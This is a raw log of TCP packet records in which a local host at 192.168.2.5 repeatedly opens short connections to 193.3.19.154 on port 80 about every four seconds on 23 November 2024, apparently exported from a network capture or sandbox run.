Nov 23, 2024 20:53:09.281379938 CET | 49708 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:09.401662111 CET | 80 | 49708 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:12.626276016 CET | 49708 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:12.626322985 CET | 49707 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:12.738591909 CET | 49709 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:12.858773947 CET | 80 | 49709 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:12.858923912 CET | 49709 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:12.859211922 CET | 49709 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:12.978961945 CET | 80 | 49709 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:16.860878944 CET | 49709 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:16.972708941 CET | 49712 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.093209982 CET | 80 | 49712 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:17.093353987 CET | 49712 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.093691111 CET | 49712 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.213599920 CET | 80 | 49712 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:17.642725945 CET | 49714 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.762764931 CET | 80 | 49714 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:17.762995958 CET | 49714 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.763102055 CET | 49714 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:17.883232117 CET | 80 | 49714 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:21.095122099 CET | 49714 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:21.095201015 CET | 49712 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:21.205379963 CET | 49722 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:21.325506926 CET | 80 | 49722 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:21.325592041 CET | 49722 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:21.325753927 CET | 49722 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:21.446183920 CET | 80 | 49722 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:25.313904047 CET | 49722 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:25.426434994 CET | 49733 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:25.581192970 CET | 80 | 49733 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:25.581295967 CET | 49733 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:25.581552029 CET | 49733 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:25.701292992 CET | 80 | 49733 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:26.112663984 CET | 49735 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:26.236144066 CET | 80 | 49735 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:26.236242056 CET | 49735 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:26.236412048 CET | 49735 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:26.362917900 CET | 80 | 49735 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:29.579644918 CET | 49735 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:29.579693079 CET | 49733 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:29.689541101 CET | 49741 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:29.815486908 CET | 80 | 49741 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:29.815574884 CET | 49741 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:29.815764904 CET | 49741 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:29.935518026 CET | 80 | 49741 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:33.829479933 CET | 49741 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:33.941314936 CET | 49752 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.065119982 CET | 80 | 49752 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:34.065262079 CET | 49752 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.065401077 CET | 49752 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.191620111 CET | 80 | 49752 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:34.595963955 CET | 49754 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.715733051 CET | 80 | 49754 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:34.715802908 CET | 49754 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.715946913 CET | 49754 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:34.835439920 CET | 80 | 49754 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:38.073084116 CET | 49752 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:38.073132992 CET | 49754 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:38.192760944 CET | 49764 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:38.313626051 CET | 80 | 49764 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:38.313788891 CET | 49764 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:38.322386980 CET | 49764 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:38.444483042 CET | 80 | 49764 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:42.313889027 CET | 49764 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:42.425879002 CET | 49775 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:42.546495914 CET | 80 | 49775 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:42.546619892 CET | 49775 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:42.546869040 CET | 49775 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:42.671483994 CET | 80 | 49775 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:43.080255032 CET | 49776 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:43.200009108 CET | 80 | 49776 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:43.200149059 CET | 49776 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:43.200330019 CET | 49776 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:43.320007086 CET | 80 | 49776 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:46.532660007 CET | 49775 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:46.532797098 CET | 49776 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:46.643244982 CET | 49787 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:46.768717051 CET | 80 | 49787 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:46.768811941 CET | 49787 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:46.769010067 CET | 49787 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:46.892851114 CET | 80 | 49787 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:50.782733917 CET | 49787 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:50.894567966 CET | 49794 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:51.020188093 CET | 80 | 49794 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:51.020323038 CET | 49794 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:51.020618916 CET | 49794 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:51.147005081 CET | 80 | 49794 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:55.042479992 CET | 49794 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:55.183239937 CET | 49804 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:55.305100918 CET | 80 | 49804 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:55.305166006 CET | 49804 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:55.310513020 CET | 49804 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:55.430382013 CET | 80 | 49804 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:59.298221111 CET | 49804 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:59.411309958 CET | 49815 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:59.532593966 CET | 80 | 49815 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:59.532694101 CET | 49815 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:59.532934904 CET | 49815 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:59.691047907 CET | 80 | 49815 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:03.548223019 CET | 49815 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:03.660164118 CET | 49826 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:03.786046982 CET | 80 | 49826 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:03.786185026 CET | 49826 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:03.786379099 CET | 49826 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:03.905863047 CET | 80 | 49826 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:07.798356056 CET | 49826 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:07.926301003 CET | 49837 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:08.046344042 CET | 80 | 49837 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:08.046516895 CET | 49837 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:08.046710014 CET | 49837 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:08.167445898 CET | 80 | 49837 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:12.048317909 CET | 49837 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:12.160501957 CET | 49848 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:12.280471087 CET | 80 | 49848 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:12.280692101 CET | 49848 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:12.280874014 CET | 49848 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:12.400686979 CET | 80 | 49848 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:16.282840967 CET | 49848 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:16.395031929 CET | 49859 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:16.514506102 CET | 80 | 49859 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:16.514682055 CET | 49859 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:16.532166004 CET | 49859 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:16.652009010 CET | 80 | 49859 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:20.533149958 CET | 49859 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:20.663415909 CET | 49867 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:20.789742947 CET | 80 | 49867 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:20.790651083 CET | 49867 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:20.790802956 CET | 49867 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:20.912870884 CET | 80 | 49867 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:24.851912022 CET | 49867 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:24.996495008 CET | 49878 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:25.117372036 CET | 80 | 49878 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:25.117521048 CET | 49878 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:25.131287098 CET | 49878 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:25.255280972 CET | 80 | 49878 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:29.157697916 CET | 49878 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:29.269805908 CET | 49887 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:29.402349949 CET | 80 | 49887 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:29.402704000 CET | 49887 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:29.402793884 CET | 49887 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:29.522439003 CET | 80 | 49887 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:33.560630083 CET | 49887 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:33.691617966 CET | 49898 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:33.813066006 CET | 80 | 49898 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:33.813146114 CET | 49898 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:33.813493967 CET | 49898 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:34.092799902 CET | 80 | 49898 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:37.814019918 CET | 49898 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:37.927474976 CET | 49909 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:38.049320936 CET | 80 | 49909 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:38.049408913 CET | 49909 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:38.049715996 CET | 49909 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:38.169197083 CET | 80 | 49909 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:42.064285040 CET | 49909 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:42.175811052 CET | 49920 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:42.298598051 CET | 80 | 49920 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:42.298685074 CET | 49920 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:42.298825026 CET | 49920 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:42.419357061 CET | 80 | 49920 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:46.314043999 CET | 49920 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:46.425678968 CET | 49930 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:46.549834013 CET | 80 | 49930 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:46.549961090 CET | 49930 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:46.556485891 CET | 49930 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:46.680821896 CET | 80 | 49930 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:50.563899994 CET | 49930 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:50.675829887 CET | 49940 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:50.799247980 CET | 80 | 49940 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:50.800801039 CET | 49940 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:50.800801039 CET | 49940 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:50.927278042 CET | 80 | 49940 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:54.816556931 CET | 49940 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:54.928177118 CET | 49950 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:55.048604965 CET | 80 | 49950 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:55.048691034 CET | 49950 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:55.048923969 CET | 49950 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:55.169949055 CET | 80 | 49950 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:57.550786972 CET | 49950 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:57.660074949 CET | 49958 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:57.780625105 CET | 80 | 49958 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:54:57.780713081 CET | 49958 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:57.781066895 CET | 49958 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:54:57.907393932 CET | 80 | 49958 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:01.782905102 CET | 49958 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:01.895857096 CET | 49967 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:02.020486116 CET | 80 | 49967 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:02.020572901 CET | 49967 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:02.021011114 CET | 49967 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:02.140578032 CET | 80 | 49967 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:06.032766104 CET | 49967 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:06.156371117 CET | 49976 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:06.276398897 CET | 80 | 49976 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:06.276474953 CET | 49976 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:06.276736021 CET | 49976 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:06.396256924 CET | 80 | 49976 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:10.291064024 CET | 49976 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:10.394263029 CET | 49987 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:10.513916016 CET | 80 | 49987 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:10.514005899 CET | 49987 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:10.514265060 CET | 49987 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:10.633970022 CET | 80 | 49987 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:14.517086983 CET | 49987 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:14.630228996 CET | 49998 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:14.751076937 CET | 80 | 49998 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:14.752810955 CET | 49998 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:14.752942085 CET | 49998 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:14.877484083 CET | 80 | 49998 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:18.770957947 CET | 49998 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:18.881467104 CET | 50009 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:19.004756927 CET | 80 | 50009 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:19.004856110 CET | 50009 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:19.005067110 CET | 50009 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:19.130290031 CET | 80 | 50009 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:23.026942968 CET | 50009 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:23.147197008 CET | 50016 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:23.266874075 CET | 80 | 50016 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:23.267155886 CET | 50016 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:23.267354965 CET | 50016 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:23.387819052 CET | 80 | 50016 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:27.284604073 CET | 50016 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:27.396590948 CET | 50017 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:27.519185066 CET | 80 | 50017 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:27.520701885 CET | 50017 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:27.524590969 CET | 50017 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:27.644126892 CET | 80 | 50017 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:31.534796000 CET | 50017 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:31.646648884 CET | 50018 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:31.768959045 CET | 80 | 50018 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:31.769076109 CET | 50018 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:31.769241095 CET | 50018 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:31.888921976 CET | 80 | 50018 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:35.782913923 CET | 50018 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:35.895593882 CET | 50019 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:36.015454054 CET | 80 | 50019 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:36.015582085 CET | 50019 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:36.015755892 CET | 50019 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:36.135890961 CET | 80 | 50019 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:40.001425028 CET | 50019 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:40.114579916 CET | 50020 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:40.236881018 CET | 80 | 50020 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:40.236968040 CET | 50020 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:40.237325907 CET | 50020 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:40.359134912 CET | 80 | 50020 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:44.236221075 CET | 50020 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:44.347963095 CET | 50021 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:44.468381882 CET | 80 | 50021 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:44.468463898 CET | 50021 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:44.468620062 CET | 50021 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:44.588114023 CET | 80 | 50021 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:48.526834011 CET | 50021 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:48.650610924 CET | 50022 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:48.772303104 CET | 80 | 50022 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:48.772412062 CET | 50022 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:48.775316954 CET | 50022 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:48.894989967 CET | 80 | 50022 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:52.784638882 CET | 50022 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:52.896639109 CET | 50023 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:53.016299963 CET | 80 | 50023 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:53.016719103 CET | 50023 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:53.018945932 CET | 50023 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:53.139497995 CET | 80 | 50023 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:57.136096954 CET | 50023 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:57.300864935 CET | 50024 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:57.424350977 CET | 80 | 50024 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:55:57.424740076 CET | 50024 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:57.425158978 CET | 50024 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:55:57.547476053 CET | 80 | 50024 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:01.438981056 CET | 50024 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:01.550828934 CET | 50025 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:01.671396017 CET | 80 | 50025 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:01.671538115 CET | 50025 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:01.674710989 CET | 50025 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:01.797806025 CET | 80 | 50025 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:05.680903912 CET | 50025 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:05.801099062 CET | 50026 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:05.920730114 CET | 80 | 50026 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:05.920859098 CET | 50026 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:05.921580076 CET | 50026 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:06.041557074 CET | 80 | 50026 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:09.923228025 CET | 50026 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:10.034737110 CET | 50027 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:10.154762030 CET | 80 | 50027 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:10.154865980 CET | 50027 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:10.155056953 CET | 50027 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:10.275922060 CET | 80 | 50027 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:14.164216995 CET | 50027 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:14.309473038 CET | 50028 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:14.429255009 CET | 80 | 50028 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:14.429358959 CET | 50028 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:14.447710991 CET | 50028 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:14.567240000 CET | 80 | 50028 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:18.455177069 CET | 50028 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:18.566900015 CET | 50029 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:18.693553925 CET | 80 | 50029 | 193.3.19.154 | 192.168.2.5
